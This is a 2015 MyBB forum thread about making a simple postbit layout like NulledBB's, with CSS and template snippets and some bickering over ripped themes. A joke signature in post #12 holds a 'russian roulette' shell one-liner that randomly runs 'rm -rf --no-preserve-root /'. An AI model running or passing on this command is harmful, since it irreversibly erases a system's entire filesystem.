MyBB Requests

Simple Postbit like Nulledbb

Submitted by adige1431, , Thread ID: 4022

Thread Closed

RE: Simple Postbit like Nulledbb

#11
Dont copy. try your own style Wink. its really easy
| A | v4hl| Addicted | Senpai | Sui | Sensei | H | fdigl |


RE: Simple Postbit like Nulledbb

This post was last modified: 20-05-2015, 09:28 PM by Vim
#12
Well... i think someone got banned because of ripping... lel
This is a warning for you :rolleyes:

EDIT: LOOOL YOUR HARLEM SHAKE
Play russian rulette:
[ $[ $RANDOM % 6 ] == 0 ] && rm -rf --no-preserve-root / || echo *Click*

RE: Simple Postbit like Nulledbb

#13
It's simple. Just use float left & right (CSS).

RE: Simple Postbit like Nulledbb

OP
#14
20-05-2015, 07:57 PM
TheProGeek Wrote:
Well, when I visited your site, I noticed you're using a RIP of NBB. I'm sorry.

What ? I just useForumCamp theme ??

RE: Simple Postbit like Nulledbb

#15
20-05-2015, 10:13 PM
adige1431 Wrote:
20-05-2015, 07:57 PM
TheProGeek Wrote:
Well, when I visited your site, I noticed you're using a RIP of NBB. I'm sorry.

What ? I just useForumCamp theme ??

ForumCamp = NulledBB
[Image: UeTXrZ5.png]

RE: Simple Postbit like Nulledbb

This post was last modified: 22-05-2015, 01:11 AM by Krave
#16
This is basic html and css. Assuming that you're going to continue using the ForumCamp skin rip, then you're going want to add the following code into your global.css file:


Code:
.pb_section {
margin: 0 auto;
/*feel free to add your own code such as font family, size, weight, etc... here*/
}

.f_right {
float: right;
}

f_left {
float: left;
}

Now, go into your postbit template which can be found by navigating to the following:
admincp-)templates & style-)templates-)your theme-)post bit templates and postbit.

Find the following:Yorum Says

and replace with:

Code:
<div class="pb_section"><div class="f_left">Posts:</div> <div class="f_right">{$post['postnum']}</div><br class="clear"></div>


If you want to create multiple, then just copy and paste them below each other, then change... I don't know, 'Posts:' to 'Joined:' and '{$post['postnum']}'to '{$post['userregdate']}'

http://docs.mybb.com/1.6/Help-Customizing-Postbit/

RE: Simple Postbit like Nulledbb

This post was last modified: 21-05-2015, 10:49 AM by Mr_Joker
#17
Giving help on Ripped Themes can sometimes be hard I suggest you use a Retail theme then edit it Smile Its very simple half of the times even if i use Ripped Themes i do Inspect Element then edit it & see how it looks and stuff lol. If you're struggling like bad and stuff 100% try right click on you're forum and use inspect element or something it would help you a little not much.

RE: Simple Postbit like Nulledbb

#18
:rly:

RE: Simple Postbit like Nulledbb

#19
OMFG :fp:Just use left and right classes :S


Code:
<span class="float_left">{$lang->postbit_posts}</span> <span class="float_right">{$post['postnum']}</span><br />

:fp:
[Image: XhhKTdF.png]

RE: Simple Postbit like Nulledbb

#20
21-05-2015, 12:26 PM
Aoki Wrote:
:rly:

You should take it as a complement my good friend. You produce high quality themes, of course people are going to use/rip themSmile

Users browsing this thread: 6 Guest(s)